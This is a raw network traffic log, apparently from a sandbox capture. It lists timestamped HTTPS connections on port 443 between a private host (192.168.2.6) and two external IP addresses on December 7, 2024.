Dec 7, 2024 10:51:22.287739038 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.287810087 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.287817955 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.287874937 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.288821936 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.288841009 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.289002895 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.289002895 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.289015055 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.289062023 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.289813042 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.289834023 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.289889097 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.289899111 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.289942026 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.289942026 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.292834044 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.292849064 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.292913914 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.292921066 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.292975903 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.293131113 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.293360949 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.293374062 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.294136047 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.294301987 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.294312000 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.294397116 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.294425011 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.294483900 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.294552088 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.294563055 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.295334101 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.295394897 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.295566082 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.295658112 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.296505928 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.296566010 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.296823025 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.296829939 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.296999931 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.297064066 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.297084093 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.297965050 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.298008919 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298032045 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.298044920 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298091888 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298098087 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298108101 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298204899 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298234940 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298250914 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298295021 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298302889 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298325062 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298333883 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298352003 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298372984 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298404932 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298419952 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.298440933 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298461914 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.298485994 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.298495054 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.301526070 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.301542997 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.301647902 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.301655054 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.301703930 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.306709051 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.306725979 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.306806087 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.306813955 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.306857109 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.306965113 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.306987047 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.307055950 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.307064056 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.307086945 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.307161093 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.307382107 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.307399988 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.307456970 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.307466030 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.307497025 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.307619095 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.310476065 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.310494900 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.310574055 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.310583115 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.310622931 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.315320969 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315349102 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315371037 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315396070 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315411091 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.315419912 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315495014 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.315502882 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.315551996 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.315557957 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.316178083 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.316205978 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.316261053 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.316267967 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.316308975 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.316308975 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.319473982 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.319497108 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.319552898 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.319561958 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.319639921 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.325516939 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.325550079 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.325635910 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.325643063 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.325666904 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.325728893 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.334991932 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.335412025 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.335422039 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.336507082 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.336658001 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.336999893 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.337074995 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.337291002 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.337297916 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.339117050 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.339117050 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.339117050 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.339127064 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.378474951 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.394036055 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.444200039 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444221973 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444267988 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444294930 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444320917 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.444343090 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444386005 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.444397926 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.444407940 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.444433928 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.444499969 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.445796013 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.445818901 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.445885897 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.445894003 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.445925951 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.446038008 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.448467016 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.448502064 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.448544025 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.448553085 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.448565006 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.448594093 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.450731993 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.450751066 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.450788021 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.450795889 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.450825930 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.450850010 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.451853991 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.451872110 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.451941967 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.451941967 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.451951027 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.452162981 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.453739882 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.453758955 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.453814983 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.453821898 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.453847885 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.453910112 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456049919 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456073999 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456151962 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456161022 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456188917 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456231117 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456763029 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456785917 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456825018 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456832886 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.456865072 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.456865072 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.458492994 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.458522081 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.458574057 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.458580017 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.458590984 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.458625078 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.460705042 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.460726023 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.460788012 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.460794926 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.460813999 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.460849047 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.463661909 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463684082 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463740110 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.463748932 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463788033 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.463824987 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463844061 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463854074 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.463906050 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.463913918 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.463970900 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.464001894 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.466119051 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.466142893 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.466216087 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.466226101 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.466281891 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.466281891 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.468745947 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.468765974 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.468828917 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.468836069 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.468851089 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.469044924 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.470340014 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.470367908 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.470405102 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.470412970 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.470447063 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.470447063 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.470896959 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.470912933 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.470968008 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.470976114 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.471076965 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.473727942 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.473743916 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.473799944 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.473807096 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.473840952 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.473850965 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.476696968 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.476713896 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.476792097 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.476799965 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.476840973 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.478089094 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478113890 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478131056 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478137970 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478230000 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.478238106 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478250027 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.478256941 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.478274107 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.478296995 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.478321075 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.480947971 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.480966091 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.481024981 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.481033087 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.481072903 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484208107 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484224081 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484287024 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484294891 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484328985 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484358072 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484586954 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484606981 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484689951 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484689951 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.484699011 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.484780073 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.485119104 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.485150099 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.485177994 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.485183954 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.485224962 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.485224962 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.488506079 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.488528967 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.488568068 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.488576889 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.488609076 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.488625050 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.490695000 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.490765095 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.490771055 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.490783930 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.490788937 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.490806103 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.490835905 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.490844965 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.490905046 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.490916967 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.491053104 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492096901 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492117882 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492166042 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492172956 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492208004 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492238998 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492647886 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492676020 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492726088 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492732048 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.492754936 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.492769003 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.499056101 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.499074936 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.499136925 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.499145985 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.499190092 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.500330925 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.500355959 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.500463009 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.500473022 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.500500917 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.500571966 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.587168932 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.587259054 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:22.587352037 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:22.613689899 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.613708973 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.636276007 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.636301994 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.636375904 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.636395931 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.636424065 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.636445999 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.637763977 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.637788057 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.637831926 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.637851000 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.637877941 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.637937069 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.637952089 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.638010979 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:22.640705109 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:22.640728951 CET	443	49723	150.171.27.10	192.168.2.6
